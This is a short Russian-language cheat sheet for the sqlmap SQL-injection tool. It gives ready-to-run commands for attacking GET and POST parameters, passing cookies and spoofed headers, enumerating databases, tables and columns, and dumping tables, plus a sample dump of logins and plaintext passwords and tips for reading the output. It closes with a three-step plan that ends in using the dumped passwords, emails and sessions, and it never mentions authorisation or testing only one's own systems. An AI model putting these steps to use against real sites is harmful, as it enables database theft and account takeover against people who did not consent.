**SQLMAP ШПАРГАЛКА — Быстрый старт и чтение вывода**

---

### 🔍 1. Простая проверка GET-параметра

```bash
sqlmap -u "http://example.com/page.php?id=1" --batch
```

* `--batch`: не задаёт вопросов, автоответы по умолчанию
* Автоматически определит тип SQL-инъекции

---

### ✉️ 2. Атака на POST-запрос

```bash
sqlmap -u "http://example.com/login.php" \
  --data="user=admin&pass=123" \
  --batch
```

* `--data`: указываем POST-данные вручную

---

### 📄 3. Cookie, User-Agent, Referer (если нужна авторизация)

```bash
sqlmap -u "http://example.com/panel.php?id=3" \
  --cookie="PHPSESSID=abc123" \
  --user-agent="Mozilla/5.0" \
  --referer="http://google.com" \
  --batch
```

---

### 🔢 4. Что можно вытянуть

```bash
--dbs                        # Список всех баз
--tables -D dbname          # Все таблицы базы
--columns -D db -T users    # Все столбцы таблицы
--dump -D db -T users       # Дамп данных
```

---

### ❗️ 5. Полезные флаги

```bash
--random-agent              # Случайный User-Agent
--level=5 --risk=3          # Глубокое сканирование
--threads=10                # Параллельность (ускорение)
```

---

### 🫰️ 6. Как ЧИТАТЬ вывод sqlmap:

#### ✅ Если уязвимость найдена:

```
[INFO] testing 'AND boolean-based blind'
[INFO] GET parameter 'id' appears to be 'AND boolean-based blind' injectable
[INFO] the back-end DBMS is MySQL
```

* `parameter 'id' appears to be ... injectable` — значит уязвим.
* `boolean-based`, `error-based`, `time-based`, `union query` — типы инъекций
* `back-end DBMS is ...` — определена база (MySQL, PostgreSQL и т.д.)

#### 🔔 Если `--dump`:

```
Database: users_db
Table: users
+----+--------+----------+
| id | login  | password |
+----+--------+----------+
| 1  | admin  | admin123 |
| 2  | guest  | guestpwd |
+----+--------+----------+
```

* Это результат извлечения данных из таблицы

#### ❌ Если не найдено:

* `Parameter does not appear to be injectable`
* Проверь другие параметры или повышай `--level`

---

### 🧰 Примеры на сложных целях

```bash
sqlmap -r request.txt --batch
```

* Где `request.txt` — перехваченный запрос из Burp Suite (в Raw-формате)

---

### 🔹 Общая логика:

1. Найди параметр → передай в sqlmap
2. Получи инфу: DBMS, базы, таблицы, данные
3. Используй дампы: пароли, почты, сессии и т.д.
